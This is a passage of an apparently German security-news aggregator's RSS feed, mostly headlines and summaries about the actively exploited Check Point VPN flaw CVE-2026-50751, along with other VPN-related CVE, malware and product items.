<link>https://tsecurity.de/de/3583884/IT+Sicherheit/Cybersecurity+Nachrichten/Check+Point+warnt%3A+Angreifer+umgehen+VPN-Authentifizierung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3583884/IT+Sicherheit/Cybersecurity+Nachrichten/Check+Point+warnt%3A+Angreifer+umgehen+VPN-Authentifizierung/</guid>
<pubDate>Tue, 09 Jun 2026 10:42:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA[CISA gives feds 3 days to patch Check Point VPN bug exploited as zero-day]]></title> 
<description><![CDATA[CISA has ordered U.S. government agencies to secure their Check Point Remote Access VPN and Mobile Access deployments against a critical vulnerability exploited in zero-day attacks by Qilin ransomware affiliates. [...] ]]></description>
<link>https://tsecurity.de/de/3583817/IT+Sicherheit/Cybersecurity+Nachrichten/CISA+gives+feds+3+days+to+patch+Check+Point+VPN+bug+exploited+as+zero-day/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3583817/IT+Sicherheit/Cybersecurity+Nachrichten/CISA+gives+feds+3+days+to+patch+Check+Point+VPN+bug+exploited+as+zero-day/</guid>
<pubDate>Tue, 09 Jun 2026 10:18:39 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Version 1.0: Check Point Remote Access VPN und Mobile Access - Aktiv ausgenutzte Schwachstelle ermöglicht Aufbau von VPN-Sessions ohne Authentifizierung]]></title> 
<description><![CDATA[ ]]></description>
<link>https://tsecurity.de/de/3583710/IT+Sicherheit/Cybersecurity+Nachrichten/Version+1.0%3A+Check+Point+Remote+Access+VPN+und+Mobile+Access+-+Aktiv+ausgenutzte+Schwachstelle+erm%C3%B6glicht+Aufbau+von+VPN-Sessions+ohne+Authentifizierung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3583710/IT+Sicherheit/Cybersecurity+Nachrichten/Version+1.0%3A+Check+Point+Remote+Access+VPN+und+Mobile+Access+-+Aktiv+ausgenutzte+Schwachstelle+erm%C3%B6glicht+Aufbau+von+VPN-Sessions+ohne+Authentifizierung/</guid>
<pubDate>Tue, 09 Jun 2026 09:20:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Check Point VPN 0-Day Exploited to Deploy Ransomware Attacks]]></title> 
<description><![CDATA[Check Point Research has disclosed active exploitation of&nbsp;CVE-2026-50751, a critical authentication bypass vulnerability (CVSS 9.3) affecting Check Point Remote Access VPN and Mobile Access deployments. The flaw targets a deprecated IKEv1 key exchange protocol and has already been linked to a confirmed Qilin ransomware intrusion. CVE-2026-50751 stems from a logic flaw in the certificate validation [&hellip;]
The post Check Point VPN 0-Day Exploited to Deploy Ransomware Attacks appeared first on Cyber Security News. ]]></description>
<link>https://tsecurity.de/de/3583665/IT+Sicherheit/Cybersecurity+Nachrichten/Check+Point+VPN+0-Day+Exploited+to+Deploy+Ransomware+Attacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3583665/IT+Sicherheit/Cybersecurity+Nachrichten/Check+Point+VPN+0-Day+Exploited+to+Deploy+Ransomware+Attacks/</guid>
<pubDate>Tue, 09 Jun 2026 08:48:05 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Check Point VPN Zero-Day Under Active Exploitation by Ransomware Operators]]></title> 
<description><![CDATA[Check Point has disclosed active in-the-wild exploitation of a critical authentication bypass vulnerability, tracked as CVE-2026-50751, impacting Remote Access VPN and Mobile Access deployments configured with the deprecated IKEv1 key exchange protocol. The flaw, assigned a CVSS score of 9.3, allows unauthenticated attackers to establish VPN sessions without valid credentials by exploiting a logic flaw [&hellip;]
The post Check Point VPN Zero-Day Under Active Exploitation by Ransomware Operators appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform. ]]></description>
<link>https://tsecurity.de/de/3583581/IT+Sicherheit/Cybersecurity+Nachrichten/Check+Point+VPN+Zero-Day+Under+Active+Exploitation+by+Ransomware+Operators/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3583581/IT+Sicherheit/Cybersecurity+Nachrichten/Check+Point+VPN+Zero-Day+Under+Active+Exploitation+by+Ransomware+Operators/</guid>
<pubDate>Tue, 09 Jun 2026 07:22:41 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Check Point VPN Zero-Day Under Active Exploitation by Ransomware Operators]]></title> 
<description><![CDATA[Check Point has disclosed active in-the-wild exploitation of a critical authentication bypass vulnerability, tracked as CVE-2026-50751, impacting Remote Access VPN and Mobile Access deployments configured with the deprecated IKEv1 key exchange protocol. The flaw, assigned a CVSS score of 9.3,&hellip;
Read more &rarr;
The post Check Point VPN Zero-Day Under Active Exploitation by Ransomware Operators appeared first on IT Security News. ]]></description>
<link>https://tsecurity.de/de/3583572/IT+Sicherheit/Cybersecurity+Nachrichten/Check+Point+VPN+Zero-Day+Under+Active+Exploitation+by+Ransomware+Operators/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3583572/IT+Sicherheit/Cybersecurity+Nachrichten/Check+Point+VPN+Zero-Day+Under+Active+Exploitation+by+Ransomware+Operators/</guid>
<pubDate>Tue, 09 Jun 2026 07:34:13 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Check Point VPN: Kritische Lücke seit Mai aktiv ausgenutzt - BornCity]]></title> 
<description><![CDATA[... Hacker und Datendiebe absichern. 5 sofort umsetzbare Schutzma&szlig;nahmen entdecken. Monatelange Angriffe vor dem Fix. Die Hauptschwachstelle tr&auml;gt die&nbsp;... ]]></description>
<link>https://tsecurity.de/de/3583542/IT+Sicherheit/Hacker/Check+Point+VPN%3A+Kritische+L%C3%BCcke+seit+Mai+aktiv+ausgenutzt+-+BornCity/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3583542/IT+Sicherheit/Hacker/Check+Point+VPN%3A+Kritische+L%C3%BCcke+seit+Mai+aktiv+ausgenutzt+-+BornCity/</guid>
<pubDate>Tue, 09 Jun 2026 06:51:07 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Critical Check Point VPN Flaw Exploited to Bypass Passwords in IKEv1 Setups]]></title> 
<description><![CDATA[Ravie LakshmananJun 08, 2026Vulnerability / Network Security Check Point has warned of active exploitation of a critical vulnerability impacting Remote Access VPN and Mobile Access deployments that are configured to use the deprecated IKEv1 key exchange protocol. The vulnerability, tracked as CVE-2026-50751 (CVSS score: 9.3), is a case of a logic flow weakness in certificate [&hellip;] ]]></description>
<link>https://tsecurity.de/de/3583410/IT+Sicherheit/Cybersecurity+Nachrichten/Critical+Check+Point+VPN+Flaw+Exploited+to+Bypass+Passwords+in+IKEv1+Setups/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3583410/IT+Sicherheit/Cybersecurity+Nachrichten/Critical+Check+Point+VPN+Flaw+Exploited+to+Bypass+Passwords+in+IKEv1+Setups/</guid>
<pubDate>Tue, 09 Jun 2026 05:17:35 +0200</pubDate>
</item>
<item> 
<title><![CDATA[CVE-2026-10872 | Shibby Tomato 1.28.0000 Web UI /sbin/rc start_vpnserver os command injection]]></title> 
<description><![CDATA[A vulnerability was found in Shibby Tomato 1.28.0000. It has been rated as critical. This issue affects the function start_vpnserver of the file /sbin/rc of the component Web UI. Performing a manipulation results in os command injection.

This vulnerability is identified as CVE-2026-10872. The attack can be initiated remotely. Additionally, an exploit exists.

This project is superseded by FreshTomato. ]]></description>
<link>https://tsecurity.de/de/3583350/IT+Reverse+Engineering/Sicherheitsl%C3%BCcken/CVE-2026-10872+%7C+Shibby+Tomato+1.28.0000+Web+UI+%2Fsbin%2Frc+start_vpnserver+os+command+injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3583350/IT+Reverse+Engineering/Sicherheitsl%C3%BCcken/CVE-2026-10872+%7C+Shibby+Tomato+1.28.0000+Web+UI+%2Fsbin%2Frc+start_vpnserver+os+command+injection/</guid>
<pubDate>Tue, 09 Jun 2026 03:52:54 +0200</pubDate>
</item>
<item> 
<title><![CDATA[CVE-2026-35058 | OpenVPN up to 2.6.19/2.7.1 Packet Length assertion (EUVD-2026-35197)]]></title> 
<description><![CDATA[A vulnerability was found in OpenVPN up to 2.6.19/2.7.1. It has been classified as problematic. Impacted is an unknown function of the component Packet Length Handler. Performing a manipulation results in reachable assertion.

This vulnerability is reported as CVE-2026-35058. The attack is possible to be carried out remotely. No exploit exists. ]]></description>
<link>https://tsecurity.de/de/3583256/IT+Reverse+Engineering/Sicherheitsl%C3%BCcken/CVE-2026-35058+%7C+OpenVPN+up+to+2.6.19%2F2.7.1+Packet+Length+assertion+%28EUVD-2026-35197%29/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3583256/IT+Reverse+Engineering/Sicherheitsl%C3%BCcken/CVE-2026-35058+%7C+OpenVPN+up+to+2.6.19%2F2.7.1+Packet+Length+assertion+%28EUVD-2026-35197%29/</guid>
<pubDate>Tue, 09 Jun 2026 02:31:14 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Schwachstelle CVE-2026-50751 wird bei Check Point-Produkten in VPN-Verbindungen angegriffen]]></title> 
<description><![CDATA[Anbieter Check Point hat eine kritische Schwachstelle (CVE-2026-50751) in seinen VPN-Produkten &ouml;ffentlich gemacht. Die Sicherheitsl&uuml;cke erm&ouml;glicht bei bestimmten&nbsp; VPN-Konfigurationen einen mobilen Zugriff eine Umgehung der Authentifizierung. Die Schwachstelle wird ausgenutzt, aber es gibt einen Patch. Die Information ist mir bereits &hellip; Weiterlesen &rarr;
Quelle ]]></description>
<link>https://tsecurity.de/de/3583151/IT+Nachrichten/Schwachstelle+CVE-2026-50751+wird+bei+Check+Point-Produkten+in+VPN-Verbindungen+angegriffen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3583151/IT+Nachrichten/Schwachstelle+CVE-2026-50751+wird+bei+Check+Point-Produkten+in+VPN-Verbindungen+angegriffen/</guid>
<pubDate>Mon, 08 Jun 2026 23:29:23 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Check Point VPN Flaw Exploited Since Early May]]></title> 
<description><![CDATA[A newly discovered, critical zero-day vulnerability is under attack; a Qilin ransomware affiliate has been blamed for at least one incident. ]]></description>
<link>https://tsecurity.de/de/3582864/IT+Sicherheit/Cybersecurity+Nachrichten/Check+Point+VPN+Flaw+Exploited+Since+Early+May/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3582864/IT+Sicherheit/Cybersecurity+Nachrichten/Check+Point+VPN+Flaw+Exploited+Since+Early+May/</guid>
<pubDate>Mon, 08 Jun 2026 22:28:35 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Check Point VPN 0-day Vulnerability Exploited in the Wild to Deploy Ransomware]]></title> 
<description><![CDATA[Check Point Research has uncovered active exploitation of CVE-2026-50751, a critical authentication bypass vulnerability (CVSS 9.3) in Check Point Remote Access VPN and Mobile Access deployments, with confirmed post-compromise activity linked to the Qilin ransomware gang. CVE-2026-50751 targets deployments configured&hellip;
Read more &rarr;
The post Check Point VPN 0-day Vulnerability Exploited in the Wild to Deploy Ransomware appeared first on IT Security News. ]]></description>
<link>https://tsecurity.de/de/3582683/IT+Sicherheit/Cybersecurity+Nachrichten/Check+Point+VPN+0-day+Vulnerability+Exploited+in+the+Wild+to+Deploy+Ransomware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3582683/IT+Sicherheit/Cybersecurity+Nachrichten/Check+Point+VPN+0-day+Vulnerability+Exploited+in+the+Wild+to+Deploy+Ransomware/</guid>
<pubDate>Mon, 08 Jun 2026 21:34:02 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Critical Check Point VPN Zero-Day Exploited in the Wild (CVE-2026-50751)]]></title> 
<description><![CDATA[OverviewOn June 8, 2026, Check Point published a security advisory for CVE-2026-50751, a critical authentication bypass vulnerability affecting Check Point Remote Access VPN, Mobile Access, and Spark Firewall products. The vulnerability affects deployments configured to use the deprecated IKEv1 key exchange protocol where gateways accept legacy Remote Access clients and do not require a machine certificate for connections.CVE-2026-50751, classified as improper authentication (CWE-287), has a CVSS score of 9.3. The vulnerability stems from a logic flow weakness in how Remote Access and Mobile Access components validate certificates during IKEv1 key exchange; successful exploitation allows an unauthenticated attacker to establish a VPN session without providing valid credentials. Per the vendor, additional post-authentication activity is required to access internal resources or escalate privileges.Check Point has indicated that CVE-2026-50751 is being actively exploited in the wild, with observed activity dating back to May 7, 2026 and an increase in early June. The vendor characterizes the campaign as limited in scope, affecting several dozen organizations. At least one incident has been linked to a Qilin ransomware affiliate, which Check Point assesses with medium confidence.Separately, during its investigation Check Point identified a related vulnerability, CVE-2026-50752 (CVSS 7.4), in the same IKEv1 code path that could enable a man-in-the-middle attack against site-to-site VPN tunnels under certain configurations. No exploitation of CVE-2026-50752 has been observed.Check Point VPN products have been targeted by zero-day vulnerabilities in the past. In May 2024, CVE-2024-24919, a high-severity information disclosure vulnerability in Check Point Quantum Security Gateways, was exploited in the wild and subsequently added to the CISA Known Exploited Vulnerabilities (KEV) catalog. Organizations running affected Check Point products are urged to apply the available hot fixes and follow the vendor guidance to remediate these issues.Mitigation guidanceCheck Point has released hotfixes to remediate CVE-2026-50751. Affected organizations should apply the available updates on an emergency basis, without waiting for a regular patch cycle to occur.The following products and versions are affected (Remote Access VPN, Mobile Access / SSL VPN, Spark Firewall):R80.20.X (End of Support)R80.40 (End of Support)R81 (End of Support)R81.10 (End of Support)R81.10.XR81.20R82R82.00.XR82.10Notably, four of the nine affected version branches (R80.20.X, R80.40, R81, R81.10) have reached End of Support. Organizations still running these versions should prioritize migration to a supported release.For organizations unable to immediately apply the hotfix, Check Point has provided the following alternative mitigations:Remove support for the legacy remote access clientConfigure global properties for Remote Access VPN authentication to IKEv2 onlySet machine certificate authentication as mandatoryEnable IPS and download the latest signaturesRapid7 strongly recommends looking for signs of compromise even after the hotfix has been applied. Per Check Point&#039;s advisory, incident response teams should prioritize forensic log audits and configuration reviews starting from May 7, 2026, the earliest known date of exploitation.For the latest mitigation guidance, please refer to the vendor advisory.Rapid7 customersExposure Command, InsightVM, and NexposeExposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-50751 with a vulnerability check expected to be available in the June 9 content release.Indicators of compromiseCheck Point has published the following indicators associated with the CVE-2026-50751 exploitation campaign. The attacker infrastructure consists of VPS hosts from several providers (Kaupo Cloud HK, Shock Hosting, Vultr Holdings), and Check Point notes that in some cases, the VPS region matched the geography of the targeted organization.IP addresses:45.77.149[.]152209.182.225[.]13638.60.157[.]139162.33.177[.]10145.76.26[.]42144.208.127[.]15538.54.88[.]20138.54.107[.]16766.42.99[.]200File hashes (MD5):52fda5c1b9704544f32ee98d9060e68951d39aa39478beeac94f2d12f682ecceCheck Point observed post-exploitation attempts to retrieve ELF payloads from attacker-controlled servers, and identified ties to the Qilin ransomware operation based on binary analysis. For the full and most current list of IOCs, please refer to the vendor advisory.UpdatesJune 8, 2026: Initial publication. ]]></description>
<link>https://tsecurity.de/de/3582351/IT+Sicherheit/Cybersecurity+Nachrichten/Critical+Check+Point+VPN+Zero-Day+Exploited+in+the+Wild+%28CVE-2026-50751%29/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3582351/IT+Sicherheit/Cybersecurity+Nachrichten/Critical+Check+Point+VPN+Zero-Day+Exploited+in+the+Wild+%28CVE-2026-50751%29/</guid>
<pubDate>Mon, 08 Jun 2026 19:05:16 +0200</pubDate>
</item>
<item> 
<title><![CDATA[China Steps Up Crackdown on Unauthorised VPN Use, Report]]></title> 
<description><![CDATA[Fresh data shows China has tightened its grip on unauthorized virtual private networks. Residents now face growing difficulty accessing foreign websites and apps. The Global Public Policy Institute examined internet traffic patterns in northwestern China&rsquo;s Xinjiang region. The team reviewed more than one hundred thousand internal documents from a local tech firm called Geedge Networks. [&hellip;]
The post China Steps Up Crackdown on Unauthorised VPN Use, Report appeared first on PrivacySavvy. ]]></description>
<link>https://tsecurity.de/de/3582347/IT+Sicherheit/Cybersecurity+Nachrichten/China+Steps+Up+Crackdown+on+Unauthorised+VPN+Use%2C+Report/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3582347/IT+Sicherheit/Cybersecurity+Nachrichten/China+Steps+Up+Crackdown+on+Unauthorised+VPN+Use%2C+Report/</guid>
<pubDate>Mon, 08 Jun 2026 19:43:25 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Ransomware crims got a month-long head start on Check Point VPN 0-day that now has a fix]]></title> 
<description><![CDATA[Scumbags, including a Qilin ransomware affiliate, began hitting this hole May 7 This article has been indexed from www.theregister.com &ndash; Articles Read the original article: Ransomware crims got a month-long head start on Check Point VPN 0-day that now has&hellip;
Read more &rarr;
The post Ransomware crims got a month-long head start on Check Point VPN 0-day that now has a fix appeared first on IT Security News. ]]></description>
<link>https://tsecurity.de/de/3582290/IT+Sicherheit/Cybersecurity+Nachrichten/Ransomware+crims+got+a+month-long+head+start+on+Check+Point+VPN+0-day+that+now+has+a+fix/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3582290/IT+Sicherheit/Cybersecurity+Nachrichten/Ransomware+crims+got+a+month-long+head+start+on+Check+Point+VPN+0-day+that+now+has+a+fix/</guid>
<pubDate>Mon, 08 Jun 2026 19:34:23 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Ransomware crims got a month-long head start on Check Point VPN 0-day that now has a fix]]></title> 
<description><![CDATA[Scumbags, including a Qilin ransomware affiliate, began hitting this hole May 7 ]]></description>
<link>https://tsecurity.de/de/3582245/IT+Sicherheit/Cybersecurity+Nachrichten/Ransomware+crims+got+a+month-long+head+start+on+Check+Point+VPN+0-day+that+now+has+a+fix/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3582245/IT+Sicherheit/Cybersecurity+Nachrichten/Ransomware+crims+got+a+month-long+head+start+on+Check+Point+VPN+0-day+that+now+has+a+fix/</guid>
<pubDate>Mon, 08 Jun 2026 19:10:31 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Check Point VPN 0-day Vulnerability Exploited in the Wild to Deploy Ransomware]]></title> 
<description><![CDATA[Check Point Research has uncovered active exploitation of CVE-2026-50751, a critical authentication bypass vulnerability (CVSS 9.3) in Check Point Remote Access VPN and Mobile Access deployments, with confirmed post-compromise activity linked to the Qilin ransomware gang. CVE-2026-50751 targets deployments configured to use the deprecated IKEv1 key exchange protocol. By exploiting a logic flaw in certificate [&hellip;]
The post Check Point VPN 0-day Vulnerability Exploited in the Wild to Deploy Ransomware appeared first on Cyber Security News. ]]></description>
<link>https://tsecurity.de/de/3582243/IT+Sicherheit/Cybersecurity+Nachrichten/Check+Point+VPN+0-day+Vulnerability+Exploited+in+the+Wild+to+Deploy+Ransomware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3582243/IT+Sicherheit/Cybersecurity+Nachrichten/Check+Point+VPN+0-day+Vulnerability+Exploited+in+the+Wild+to+Deploy+Ransomware/</guid>
<pubDate>Mon, 08 Jun 2026 19:18:01 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Fake X-VPN installer deploys STX RAT malware on unsuspecting users]]></title> 
<description><![CDATA[An active malware distribution campaign employs a fake X-VPN installer to deploy the STX RAT in memory and steal credentials from victims. The campaign was documented by Cyderes threat researchers, who say the operation remained active after earlier disclosures, with the perpetrators rotating infrastructure and continuing the distribution of new malware-laced software packages. The investigation &hellip;
The post Fake X-VPN installer deploys STX RAT malware on unsuspecting users appeared first on CyberInsider. ]]></description>
<link>https://tsecurity.de/de/3582119/IT+Sicherheit/Cybersecurity+Nachrichten/Fake+X-VPN+installer+deploys+STX+RAT+malware+on+unsuspecting+users/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3582119/IT+Sicherheit/Cybersecurity+Nachrichten/Fake+X-VPN+installer+deploys+STX+RAT+malware+on+unsuspecting+users/</guid>
<pubDate>Mon, 08 Jun 2026 18:35:50 +0200</pubDate>
</item>
<item> 
<title><![CDATA[ExpressVPN Is on Sale for $40: A Great Deal for Remote Teams]]></title> 
<description><![CDATA[For remote workers and IT professionals juggling multiple devices, this VPN deal is worth a serious look. The post ExpressVPN Is on Sale for $40: A Great Deal for Remote Teams appeared first on TechRepublic. This article has been indexed&hellip;
Read more &rarr;
The post ExpressVPN Is on Sale for $40: A Great Deal for Remote Teams appeared first on IT Security News. ]]></description>
<link>https://tsecurity.de/de/3582015/IT+Sicherheit/Cybersecurity+Nachrichten/ExpressVPN+Is+on+Sale+for+%2440%3A+A+Great+Deal+for+Remote+Teams/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3582015/IT+Sicherheit/Cybersecurity+Nachrichten/ExpressVPN+Is+on+Sale+for+%2440%3A+A+Great+Deal+for+Remote+Teams/</guid>
<pubDate>Mon, 08 Jun 2026 18:05:48 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Check Point warnt vor aktiv genutzter VPN-Lücke (CVE-2026-50751) - Security-Insider]]></title> 
<description><![CDATA[Supportende von Windows Server 2016 &amp; Windows 10 Enterprise LTSC 2021. Windows Server 2016 wird 2027 zur Sicherheitsl&uuml;cke. Hotfix sollte sofort&nbsp;... ]]></description>
<link>https://tsecurity.de/de/3581939/IT+Server/Windows+Server/Check+Point+warnt+vor+aktiv+genutzter+VPN-L%C3%BCcke+%28CVE-2026-50751%29+-+Security-Insider/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581939/IT+Server/Windows+Server/Check+Point+warnt+vor+aktiv+genutzter+VPN-L%C3%BCcke+%28CVE-2026-50751%29+-+Security-Insider/</guid>
<pubDate>Mon, 08 Jun 2026 16:31:40 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Critical Check Point VPN Flaw Exploited to Bypass Passwords in IKEv1 Setups]]></title> 
<description><![CDATA[Check Point has warned of active exploitation of a critical vulnerability impacting Remote Access VPN and Mobile Access deployments that are configured to use the deprecated IKEv1 key exchange protocol. The vulnerability, tracked as CVE-2026-50751 (CVSS score: 9.3), is a&hellip;
Read more &rarr;
The post Critical Check Point VPN Flaw Exploited to Bypass Passwords in IKEv1 Setups appeared first on IT Security News. ]]></description>
<link>https://tsecurity.de/de/3581930/IT+Sicherheit/Cybersecurity+Nachrichten/Critical+Check+Point+VPN+Flaw+Exploited+to+Bypass+Passwords+in+IKEv1+Setups/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581930/IT+Sicherheit/Cybersecurity+Nachrichten/Critical+Check+Point+VPN+Flaw+Exploited+to+Bypass+Passwords+in+IKEv1+Setups/</guid>
<pubDate>Mon, 08 Jun 2026 17:32:07 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Critical Check Point VPN Flaw Exploited to Bypass Passwords in IKEv1 Setups]]></title> 
<description><![CDATA[Check Point has warned of active exploitation of a critical vulnerability impacting Remote Access VPN and Mobile Access deployments that are configured to use the deprecated IKEv1 key exchange protocol.

The vulnerability, tracked as CVE-2026-50751 (CVSS score: 9.3), is a case of a logic flow weakness in certificate validation that allows an unauthenticated remote attacker to bypass user ]]></description>
<link>https://tsecurity.de/de/3581892/IT+Sicherheit/Cybersecurity+Nachrichten/Critical+Check+Point+VPN+Flaw+Exploited+to+Bypass+Passwords+in+IKEv1+Setups/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581892/IT+Sicherheit/Cybersecurity+Nachrichten/Critical+Check+Point+VPN+Flaw+Exploited+to+Bypass+Passwords+in+IKEv1+Setups/</guid>
<pubDate>Mon, 08 Jun 2026 16:17:39 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Check Point warnt vor aktiv ausgenutzter VPN-Schwachstelle]]></title> 
<description><![CDATA[Check Point informiert Kunden &uuml;ber eine aktiv ausgenutzte Schwachstelle in bestimmten VPN-Konfigurationen. Die kritische L&uuml;cke CVE-2026-50751 betrifft VPN Remote Access und Mobile Access in Verbindung mit dem veralteten IKEv1-Schl&uuml;sselaustausch. Ein Hotfix steht bereit und schlie&szlig;t zus&auml;tzlich eine weitere VPN-Schwachstelle. ]]></description>
<link>https://tsecurity.de/de/3581787/IT+Sicherheit/Cybersecurity+Nachrichten/Check+Point+warnt+vor+aktiv+ausgenutzter+VPN-Schwachstelle/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581787/IT+Sicherheit/Cybersecurity+Nachrichten/Check+Point+warnt+vor+aktiv+ausgenutzter+VPN-Schwachstelle/</guid>
<pubDate>Mon, 08 Jun 2026 16:00:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA[X-VPN proves its privacy credentials with new independent no-logs audit]]></title> 
<description><![CDATA[X-VPN has officially passed an independent no-logs audit conducted by a Big Four firm, confirming it doesn&#039;t track, store, or monitor your online activity. Here&#039;s why it matters for your privacy. ]]></description>
<link>https://tsecurity.de/de/3581637/IT+Nachrichten/X-VPN+proves+its+privacy+credentials+with+new+independent+no-logs+audit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581637/IT+Nachrichten/X-VPN+proves+its+privacy+credentials+with+new+independent+no-logs+audit/</guid>
<pubDate>Mon, 08 Jun 2026 15:46:03 +0200</pubDate>
</item>
<item> 
<title><![CDATA[ExpressVPN Is on Sale for $40: A Great Deal for Remote Teams]]></title> 
<description><![CDATA[For remote workers and IT professionals juggling multiple devices, this VPN deal is worth a serious look.
The post ExpressVPN Is on Sale for $40: A Great Deal for Remote Teams appeared first on TechRepublic. ]]></description>
<link>https://tsecurity.de/de/3581617/IT+Sicherheit/Cybersecurity+Nachrichten/ExpressVPN+Is+on+Sale+for+%2440%3A+A+Great+Deal+for+Remote+Teams/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581617/IT+Sicherheit/Cybersecurity+Nachrichten/ExpressVPN+Is+on+Sale+for+%2440%3A+A+Great+Deal+for+Remote+Teams/</guid>
<pubDate>Mon, 08 Jun 2026 11:13:52 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Check Point links VPN zero-day attacks to Qilin ransomware gang]]></title> 
<description><![CDATA[Israeli cybersecurity company Check Point has released security updates to patch a critical flaw affecting Remote Access VPN and Mobile Access deployments, which was exploited in zero-day attacks. [...] ]]></description>
<link>https://tsecurity.de/de/3581571/IT+Sicherheit/Cybersecurity+Nachrichten/Check+Point+links+VPN+zero-day+attacks+to+Qilin+ransomware+gang/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581571/IT+Sicherheit/Cybersecurity+Nachrichten/Check+Point+links+VPN+zero-day+attacks+to+Qilin+ransomware+gang/</guid>
<pubDate>Mon, 08 Jun 2026 15:05:16 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Qilin ransomware affiliate exploited Check Point VPN zero-day (CVE-2026-50751)]]></title> 
<description><![CDATA[A Qilin ransomware affiliate is believed to be exploiting CVE-2026-50751, an authentication bypass vulnerability in Check Point VPN Remote Access and Mobile Access, the company announced on Monday. About CVE-2026-50751 Check Point Remote Access VPN enables and secures connections between corporate networks and remote or mobile devices. Check Point Mobile Access lets mobile and remote workers connect securely to email, calendar, contacts, and corporate applications. CVE-2026-50751 affects both solutions, but only if they are configured &hellip; More &rarr;
The post Qilin ransomware affiliate exploited Check Point VPN zero-day (CVE-2026-50751) appeared first on Help Net Security. ]]></description>
<link>https://tsecurity.de/de/3581484/IT+Sicherheit/Cybersecurity+Nachrichten/Qilin+ransomware+affiliate+exploited+Check+Point+VPN+zero-day+%28CVE-2026-50751%29/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581484/IT+Sicherheit/Cybersecurity+Nachrichten/Qilin+ransomware+affiliate+exploited+Check+Point+VPN+zero-day+%28CVE-2026-50751%29/</guid>
<pubDate>Mon, 08 Jun 2026 14:23:16 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Qilin ransomware affiliate exploited Check Point VPN zero-day (CVE-2026-50751)]]></title> 
<description><![CDATA[A Qilin ransomware affiliate is believed to be exploiting CVE-2026-50751, an authentication bypass vulnerability in Check Point VPN Remote Access and Mobile Access, the company announced on Monday. About CVE-2026-50751 Check Point Remote Access VPN enables and secures connections between&hellip;
Read more &rarr;
The post Qilin ransomware affiliate exploited Check Point VPN zero-day (CVE-2026-50751) appeared first on IT Security News. ]]></description>
<link>https://tsecurity.de/de/3581478/IT+Sicherheit/Cybersecurity+Nachrichten/Qilin+ransomware+affiliate+exploited+Check+Point+VPN+zero-day+%28CVE-2026-50751%29/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581478/IT+Sicherheit/Cybersecurity+Nachrichten/Qilin+ransomware+affiliate+exploited+Check+Point+VPN+zero-day+%28CVE-2026-50751%29/</guid>
<pubDate>Mon, 08 Jun 2026 14:34:49 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Security Advisory – Action Required – Active Exploitation of Check Point VPN Authentication Bypass (CVE-2026-50751)]]></title> 
<description><![CDATA[Check Point Research has identified active exploitation of CVE-2026-50751, a critical authentication bypass vulnerability affecting Check Point Remote Access VPN and Mobile Access deployments configured to use the deprecated IKEv1 key exchange protocol. By exploiting a logic flaw in certificate&hellip;
Read more &rarr;
The post Security Advisory &ndash; Action Required &ndash; Active Exploitation of Check Point VPN Authentication Bypass (CVE-2026-50751) appeared first on IT Security News. ]]></description>
<link>https://tsecurity.de/de/3581205/IT+Sicherheit/Cybersecurity+Nachrichten/Security+Advisory+%E2%80%93+Action+Required+%E2%80%93+Active+Exploitation+of+Check+Point+VPN+Authentication+Bypass+%28CVE-2026-50751%29/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581205/IT+Sicherheit/Cybersecurity+Nachrichten/Security+Advisory+%E2%80%93+Action+Required+%E2%80%93+Active+Exploitation+of+Check+Point+VPN+Authentication+Bypass+%28CVE-2026-50751%29/</guid>
<pubDate>Mon, 08 Jun 2026 13:05:35 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Security Advisory – Action Required – Active Exploitation of Check Point VPN Authentication Bypass (CVE-2026-50751)]]></title> 
